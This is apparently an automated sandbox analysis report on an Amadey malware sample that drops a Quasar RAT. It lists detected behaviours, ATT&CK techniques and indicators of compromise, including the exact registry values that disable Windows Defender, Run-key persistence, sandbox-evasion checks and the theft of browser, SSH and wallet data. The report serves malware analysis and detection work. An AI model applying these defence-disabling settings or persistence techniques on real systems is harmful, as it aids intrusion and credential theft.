amadey | bc1df4f47b17e75b36caabd80929c36b6cb5b3c11aaca17fa069a99597e9eab1

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	b43c992318.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	b43c992318.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	b43c992318.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	b43c992318.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	b43c992318.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	b43c992318.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	b43c992318.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	b43c992318.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications	b43c992318.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	b43c992318.exe

Modifies security service 2 TTPs 2 IoCs

Modify Registry

Windows Service

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/3112-196-0x000000000CCF0000-0x000000000CE44000-memory.dmp	family_quasar
behavioral1/memory/3112-197-0x000000000CE70000-0x000000000CE8A000-memory.dmp	family_quasar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	43b13e599f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7381290483.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	IeGkDOqzXwi9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b43c992318.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	275ebaba42.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ac5ed4bbfd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5JJTKUd3aM0z.exe

Blocklisted process makes network request 5 IoCs

flow	pid	Process
95	3112	powershell.exe
122	3112	powershell.exe
255	3112	powershell.exe
297	3112	powershell.exe
331	3112	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5036	powershell.exe
6432	powershell.exe
3668	powershell.exe
4844	powershell.exe
5552	powershell.exe
5204	powershell.exe
3112	powershell.exe
4072	powershell.exe
5692	powershell.exe
6132	powershell.exe
1100	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 20 IoCs

flow	pid	Process
61	5028	rapes.exe
96	5028	rapes.exe
96	5028	rapes.exe
96	5028	rapes.exe
96	5028	rapes.exe
96	5028	rapes.exe
96	5028	rapes.exe
96	5028	rapes.exe
96	5028	rapes.exe
139	5744	68ab528098.exe
267	2344	svchost015.exe
273	6188	svchost.exe
286	5168	svchost015.exe
27	5028	rapes.exe
78	5028	rapes.exe
52	5028	rapes.exe
52	5028	rapes.exe
295	5028	rapes.exe
266	5028	rapes.exe
271	5028	rapes.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

Windows Service

credential_access stealer

Disable or Modify System Firewall

T1562.004

pid	Process
6452	netsh.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
5784	takeown.exe
3748	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
4716	chrome.exe
808	msedge.exe
2844	msedge.exe
4996	msedge.exe
3848	msedge.exe
4048	chrome.exe
4208	chrome.exe
3852	chrome.exe
3240	msedge.exe

Checks BIOS information in registry 2 TTPs 24 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	IeGkDOqzXwi9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	275ebaba42.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	43b13e599f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7381290483.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	68ab528098.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	IeGkDOqzXwi9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	68ab528098.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5JJTKUd3aM0z.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5JJTKUd3aM0z.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b43c992318.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7381290483.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ac5ed4bbfd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b43c992318.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	275ebaba42.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ac5ed4bbfd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	43b13e599f.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	68ab528098.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	261.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Deletes itself 1 IoCs

pid	Process
5164	w32tm.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_21cf30a6.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_21cf30a6.cmd	powershell.exe

Executes dropped EXE 30 IoCs

pid	Process
5028	rapes.exe
4620	XOPPRUc.exe
3056	h8NlU62.exe
4504	qWR3lUj.exe
4512	YGYZCmt.exe
2344	rapes.exe
4084	captcha.exe
2316	275ebaba42.exe
4008	ac5ed4bbfd.exe
2344	svchost015.exe
4008	43b13e599f.exe
5168	svchost015.exe
5340	7381290483.exe
5744	68ab528098.exe
5552	b57d7fa1b5.exe
4928	IeGkDOqzXwi9.exe
2392	5JJTKUd3aM0z.exe
5348	b43c992318.exe
4140	9a3f4a2326.exe
3580	rapes.exe
6276	136d7a97c3.exe
1620	YGYZCmt.exe
3760	Rm3cVPI.exe
1448	p3hx1_003.exe
6628	qWR3lUj.exe
5992	apple.exe
5488	261.exe
5740	261.exe
1624	tzutil.exe
5164	w32tm.exe

Identifies Wine through registry keys 2 TTPs 11 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	7381290483.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	5JJTKUd3aM0z.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	b43c992318.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	ac5ed4bbfd.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	IeGkDOqzXwi9.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	275ebaba42.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	43b13e599f.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5784	takeown.exe
3748	icacls.exe

Reads ssh keys stored on the system 2 TTPs
Tries to access SSH used by SSH programs.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	b43c992318.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	b43c992318.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7381290483.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416740101\\7381290483.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\68ab528098.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416750101\\68ab528098.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b57d7fa1b5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416760101\\b57d7fa1b5.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b43c992318.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416770101\\b43c992318.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	captcha.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0006000000023442-535.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 20 IoCs

discovery

Process Discovery

T1057

pid	Process
3876	tasklist.exe
2904	tasklist.exe
4164	tasklist.exe
2592	tasklist.exe
2300	tasklist.exe
1072	tasklist.exe
3664	tasklist.exe
6068	tasklist.exe
4652	tasklist.exe
5024	tasklist.exe
4524	tasklist.exe
1676	tasklist.exe
1716	tasklist.exe
4504	tasklist.exe
3160	tasklist.exe
5056	tasklist.exe
3152	tasklist.exe
4984	tasklist.exe
4048	tasklist.exe
1988	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs

pid	Process
3108	random.exe
5028	rapes.exe
2344	rapes.exe
2316	275ebaba42.exe
4008	ac5ed4bbfd.exe
4008	43b13e599f.exe
5340	7381290483.exe
4928	IeGkDOqzXwi9.exe
2392	5JJTKUd3aM0z.exe
5348	b43c992318.exe
3580	rapes.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 4620 set thread context of 3456	4620	XOPPRUc.exe	98
PID 3056 set thread context of 5036	3056	h8NlU62.exe	103
PID 4504 set thread context of 1168	4504	qWR3lUj.exe	106
PID 4512 set thread context of 3328	4512	YGYZCmt.exe	109
PID 4008 set thread context of 2344	4008	ac5ed4bbfd.exe	240
PID 4008 set thread context of 5168	4008	43b13e599f.exe	277
PID 4140 set thread context of 5356	4140	9a3f4a2326.exe	362
PID 1620 set thread context of 4484	1620	YGYZCmt.exe	372
PID 6628 set thread context of 5304	6628	qWR3lUj.exe	453

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	random.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

persistence privilege_escalation

Ignore Process Interrupts

T1564.011

pid	Process
4844	powershell.exe
5204	powershell.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2604	sc.exe
3576	sc.exe
2684	sc.exe
3264	sc.exe
5432	sc.exe
4456	sc.exe
7124	sc.exe
5648	sc.exe
3852	sc.exe
4180	sc.exe
5288	sc.exe
5940	sc.exe
5228	sc.exe
5128	sc.exe
5332	sc.exe
6736	sc.exe
1716	sc.exe
6920	sc.exe
6932	sc.exe
5024	sc.exe
6076	sc.exe
5352	sc.exe
1840	sc.exe
2348	sc.exe
2748	sc.exe
2484	sc.exe
4612	sc.exe
5308	sc.exe
3164	sc.exe
3224	sc.exe
3512	sc.exe
5752	sc.exe
4956	sc.exe
4928	sc.exe
4720	sc.exe
4832	sc.exe
2304	sc.exe
6620	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 36 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b43c992318.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	275ebaba42.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	43b13e599f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	p3hx1_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IeGkDOqzXwi9.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	b57d7fa1b5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	b57d7fa1b5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5JJTKUd3aM0z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	136d7a97c3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7381290483.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b57d7fa1b5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ac5ed4bbfd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
